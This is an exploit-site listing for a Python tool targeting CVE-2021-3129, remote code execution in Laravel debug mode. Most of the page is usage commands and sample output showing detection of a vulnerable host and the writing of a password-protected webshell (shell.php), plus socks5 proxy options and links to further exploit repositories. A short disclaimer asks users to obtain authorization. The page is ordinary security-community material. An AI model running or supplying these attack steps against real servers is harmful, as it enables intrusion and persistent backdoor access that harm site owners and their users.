Exploit for CVE-2021-3129

Name: Exploit for CVE-2021-3129
Rating: 5 (486 reviews)
2023-03-04 | CVSS 9.8
## https://sploitus.com/exploit?id=85CC8F81-2E10-5C33-80A8-0F7EA5C645F0
# Laravel Debug Mode RCE Vulnerability (CVE-2021-3129) POC / EXP  
> CVE-2021-3129 EXP / POC  
– Note ⚠️: Since exploitation and detection may involve multiple requests, the process may be slow.  
– Usage:  
```python
python CVE-2021-3129.py  
Usage: python CVE-2021-3129.py -u [url] --exp  
```  
**Laravel Debug Mode RCE (CVE-2021-3129) POC & EXP**  

**Optional arguments:**  
– `-h, --help`: Show this help message and exit.  
– `-u URL, --url URL`: Specify the target URL.  
– `-e, --exp`: Exploit the vulnerability to write a webshell; if not specified, only detection will be performed.  
– `-p PROXY, --proxy PROXY`: Set the proxy server, e.g., `socks5://127.0.0.1:7890`.  

**Example:**  
```python
# POC  
python CVE-2021-3129.py -u http://xxxxx.com  
[✅ Vulnerability detected! [🚩] URL: http://xxxxx.com [❇️ Info] PHP version: 7.4.14, Website path: /var/www/html, Server address: 172.17.0.2, System version: Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64  
```  
```  
# EXP  
python CVE-2021-3129.py -u http://xxxxx.com --exp  
[✅ Vulnerability detected! [🚩] URL: http://xxxxx.com [❇️ Info] PHP version: 7.4.14, Website path: /var/www/html, Server address: 172.17.0.2, System version: Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64  
[OK] Webshell successfully written; access address: http://xxxxx.com/shell.php, Password: whoami  
```  
```  
# Proxy  
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890  
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890  
```  
**Reference links:**  
– https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g  
– https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP  
– https://github.com/nth347/CVE-2021-3129_exploit  
– https://github.com/ambionics/phpggc  

**Usage notes:**  
This tool is intended for legitimate enterprise security-related activities. When using this tool for detection, ensure that your actions comply with local laws and that you have obtained sufficient authorization. If you engage in any illegal activities while using this tool, you will bear the consequences.

[source-iocs-preserved url=http://xxxxx.com/shell.php]